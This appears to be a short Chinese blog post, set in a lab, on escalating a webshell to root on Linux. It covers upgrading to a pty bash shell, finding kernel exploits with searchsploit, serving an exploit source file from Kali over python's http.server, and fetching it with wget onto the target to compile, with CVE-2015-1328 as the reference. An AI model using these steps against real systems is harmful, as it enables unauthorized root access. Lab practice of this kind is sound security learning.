webshell 提权

 

在我们使用cve或者其他方式获取shell 后

python -c 'import pty;pty.spawn("/bin/bash")'

获取一个交互式的bash  shell

使用id 命令可以查看当前的用户权限

 查看当前的linux 系统版本

 利用kali自带的漏洞检索库检索漏洞

searchsploit privilege | grep -i linux | grep -i kernel | grep 5

 使用find  或者locate 获取文件路径,locate 初次使用可能没有任何显示,需要使用updatedb更新数据

 进行exp 代码下载

启动http服务时,使用的是win11 +kali + ubuntu,ubuntu 启动vulhub ,kali启动http服务,

由于使用wsl2 的配置未使用vmware ,在localhost 可以看到对应的文件

这个是cp 拷贝到home 目录下的但是使用wget http://localhost无法下载

 使用ifconfig kali 查看ip方配置 如果没有ifconfig 使用如下命令:

apt install net-tools

PS(备用:使用打开防火墙端口)可能不需要打开 

iptables -A INPUT -p tcp -i docker0 --dport 8160 -j ACCEPT

 

ubuntu kali的地址ip 地址使用wget 对kernel cve 提权文件漏洞文件.c进行下载

在exp 的路径下使用python启用web 服务 

python3 -m http.server 8160

 使用wget 进行下载exp

 目标机中缺少动态库需要安装gcc  内核提权

参考博客:
c​​​​​​​(184条消息) Linux提权第一篇-Linux内核漏洞提权(以CVE-2015-1328为例)_OceanSec的博客-CSDN博客_linux内核提权

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值